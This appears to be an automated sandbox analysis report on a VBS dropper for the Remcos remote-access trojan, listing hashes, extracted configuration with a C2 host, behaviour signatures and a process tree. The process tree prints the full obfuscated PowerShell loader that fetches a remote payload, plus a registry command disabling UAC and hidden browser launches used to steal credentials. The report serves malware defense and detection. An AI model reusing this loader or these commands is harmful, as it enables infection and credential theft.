Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2024 14:58

General

  • Target

    SOLICITUD DE PRESUPUESTO (Escuela Politécnica Nacional Ecuador).vbs

  • Size

    33KB

  • MD5

    f6a1927833d8bdbed39158eeb8fec038

  • SHA1

    d166a956aee76d8c1a17b97905a2a554d71cd796

  • SHA256

    674affabc23dacf7e1dd9f1c663589f1c1f3a8383037f2cb1a547d48beaf34b9

  • SHA512

    6507a607f9964a923a40fdc329b3a1c5b9a36f5afb72129808a6a1121afa1c686c195a7cb8d3781e634d997ffded8b90a5a933bc9f3b06250be127373823b240

  • SSDEEP

    768:hFiasUNgXGy5FMJerHSLNj0Z6AkhZw7XJuBbVVjgHraV:jiasj5zH+GZ6v/w78XNgHuV

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

234d34gb6.duckdns.org:3613

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-CPWWCP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE PRESUPUESTO (Escuela Politécnica Nacional Ecuador).vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4856
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1216
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3856
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2592
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3292
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe1bcbcc40,0x7ffe1bcbcc4c,0x7ffe1bcbcc58
          4⤵
            PID:1056
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2208,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:2
            4⤵
              PID:2312
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:3
              4⤵
                PID:1052
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1940,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2400 /prefetch:8
                4⤵
                  PID:1204
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1904
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4524
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,6781276585872078146,4485454625998433252,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4632 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2592
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\suoncscxdkccsemopfukio"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4404
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cwbydknyrsupukaagqgdttefb"
                3⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:3060
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nqhqedxsfanterwepbtfefzwcbba"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4816
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                3⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:2728
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe0d3c46f8,0x7ffe0d3c4708,0x7ffe0d3c4718
                  4⤵
                    PID:3080
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,17178448145114258745,15439509905426765922,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
                    4⤵
                      PID:3432
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,17178448145114258745,15439509905426765922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                      4⤵
                        PID:3240
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,17178448145114258745,15439509905426765922,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
                        4⤵
                          PID:1424
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2024,17178448145114258745,15439509905426765922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                          4⤵
                          • Uses browser remote debugging
                          PID:3584
